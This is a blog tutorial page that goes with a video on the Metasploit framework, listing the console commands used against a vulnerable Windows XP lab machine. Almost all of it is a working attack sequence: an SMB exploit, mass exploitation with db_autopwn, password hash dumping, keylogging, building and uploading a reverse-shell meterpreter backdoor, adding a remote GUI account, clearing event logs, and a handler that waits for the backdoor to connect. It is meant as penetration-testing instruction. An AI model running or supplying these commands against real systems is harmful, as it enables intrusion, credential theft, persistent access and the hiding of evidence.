Messing With Metasploit

A basic guide to show how powerful the Metasploit framework is!

  • Set up & run an exploit.
  • Use nmap to scan.
  • Use db_autopwn (to exploit the masses!)
  • Gather information about the target
  • Read, download and upload files
  • Run scripts
  • Create & use a backdoor.

Links

Download video: http://download.g0tmi1k.com/videos_archive/Messing_with_Metasploit.mp4

Tools

  • Metasploit Framework
  • (Vulnerable) target (e.g. Windows XP SP0/1)

Software

Name: Metasploit

Version: 3.3.3

Home Page: http://www.metasploit.com/

Download Link: http://www.metasploit.com/framework/download/

Commands

cd /pentest/exploits/framework3/
./msfconsole
db_create g0tmi1k
db_hosts
db_add_host 10.0.0.4
db_hosts

#show                             ##Show everything! [wasn't in video]

use windows/smb/ms06_040_netapi
#use windows/dcerpc/ms03_026_dcom ##Different exploit, didn't find it as reliable

#set payload windows/shell_bind_tcp          ##Could do a windows shell (not as powerful as meterpreter)
#set payload windows/meterpreter/reverse_tcp ##Could do a meterpreter (but we do it later!)
set payload windows/vncinject/bind_tcp
show options
set lhost 10.0.0.6
show options
exploit

db_del_host 10.0.0.4
db_hosts
db_nmap -n 1O 10.0.0.1-5
db_hosts

db_autopwn -t -p -e

sessions -l
sessions -i 1

sysinfo
#ipconfig   ##IP information [wasn't in video]
idletime
ps
kill [number]
getuid
#migrate // getsystem // use priv  ##If the exploit doesn't have system privileges! [wasn't in video]
hashdump
# execute                  ## Runs a command [wasn't in video]
shell
pwd
ls
cd C:/
ls
mkdir g0tmi1k
ls
cd g0tmi1k
cat C:/boot.ini
download C:/boot.ini /tmp/boot.ini
./msfpayload windows/meterpreter/reverse_tcp lhost=10.0.0.6 X > /tmp/g0tmi1k.exe
upload /tmp/g0tmi1k.exe C:/g0tmi1k/g0tmi1k.exe
run getgui -u g0tmi1k -p haveyou
run keylogrecorder
## More scripts: /pentest/exploits/framework3/scripts/meterpreter
#run scraper    ##Gets information about target, dumps reg etc[wasn't in video]
#run vnc        ##Setups VNC [wasn't in video]
#run uploadexec ##Upload and run a program [wasn't in video]
clearev
exit -y
exit -y

##Start fresh for the backdoor!
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.6
exploit

## Somehow run: C:\g0tmi1k\g0tmi1k.exe

Notes

  • Made a few slip-ups in the video and something went wrong with keylogrecorder.
  • This is only the basic stuff - it can do A LOT more! See commands for a few more basic things which I didn't do.

Song: Vicky Devine - Facing The Truth

Video length: 9:07

Capture length: 29:20

Blog Post: https://blog.g0tmi1k.com/2010/03/messing-with-metasploit/